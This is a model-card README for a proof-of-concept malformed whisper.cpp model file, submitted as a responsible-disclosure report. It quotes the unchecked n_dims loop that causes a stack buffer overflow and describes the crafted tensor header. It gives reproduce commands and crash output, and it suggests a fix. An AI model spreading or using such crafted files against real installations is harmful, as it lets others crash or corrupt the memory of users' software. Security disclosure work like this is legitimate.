--- license: mit tags: - security - poc - huntr - model-file-vulnerability --- # PoC — whisper.cpp unchecked `n_dims` stack buffer overflow Proof-of-concept model file for a **huntr Model File Vulnerabilities** report against [`ggml-org/whisper.cpp`](https://github.com/ggml-org/whisper.cpp) @ `6fc7c33`. **This repository contains a deliberately malformed GGML model file for authorized security research (responsible disclosure via huntr). It is not a usable model.** ## The bug (summary) `whisper_model_load()` (and the sibling `whisper_vad_init_with_params()`) read a per-tensor `int32_t n_dims` from the model file and use it, **unchecked**, as the bound of a loop that writes into a fixed 4-element stack array `int32_t ne[4]`: ```cpp // src/whisper.cpp (whisper_model_load) :1874 read_safe(loader, n_dims); // attacker-controlled :1883 int32_t ne[4] = { 1, 1, 1, 1 }; // fixed 4-element STACK array :1884 for (int i = 0; i < n_dims; ++i) { :1885 read_safe(loader, ne[i]); // OOB stack write for n_dims > 4 :1886 nelements *= ne[i]; :1887 } ``` There is no `n_dims <= GGML_MAX_DIMS` check before the loop. All shape/size validation runs *after* it. A crafted model file with a large `n_dims` writes an attacker-controlled sequence of 4-byte words far past `ne[4]`, smashing the stack (CWE-787). The identical pattern exists at the VAD loader (`whisper_vad_init_with_params`, `src/whisper.cpp:5016/5025/5026`). ## Files | file | description | |---|---| | `poc_whisper_ndims.bin` | valid whisper "tiny" header + one tensor record with `n_dims=20000` and a run of `0x41414141` words. **Crashes `whisper-cli` with SIGSEGV.** | | `gen_whisper_ndims_poc.py` | pure-python generator (documents the exact header layout). | | `CRASH_PROVEN.md` | build commands + reproduced crash (attacker sentinel bytes in the fault address). | ## Reproduce ``` cmake -B build-rel -DCMAKE_BUILD_TYPE=Release -DGGML_METAL=OFF -DGGML_ACCELERATE=OFF -DGGML_BLAS=OFF \ -DWHISPER_BUILD_TESTS=OFF -DWHISPER_BUILD_SERVER=OFF \ -DCMAKE_C_FLAGS="-g -fstack-protector-all" -DCMAKE_CXX_FLAGS="-g -fstack-protector-all" cmake --build build-rel --target whisper-cli ./build-rel/bin/whisper-cli -m poc_whisper_ndims.bin -f /dev/null ``` Observed (default Release, no sanitizer): ``` whisper_model_load: CPU total size = 77.11 MB <- model built; enters the tensor-read loop stop reason = EXC_BAD_ACCESS (code=1, address=0x141414149) <- attacker's 0x41414141 bytes in the fault address exit=139 (SIGSEGV) ``` See `CRASH_PROVEN.md`. ## Disclosure Reported privately via huntr. Suggested fix: `if (n_dims < 0 || n_dims > GGML_MAX_DIMS) return false;` before the fill loop, at both call sites.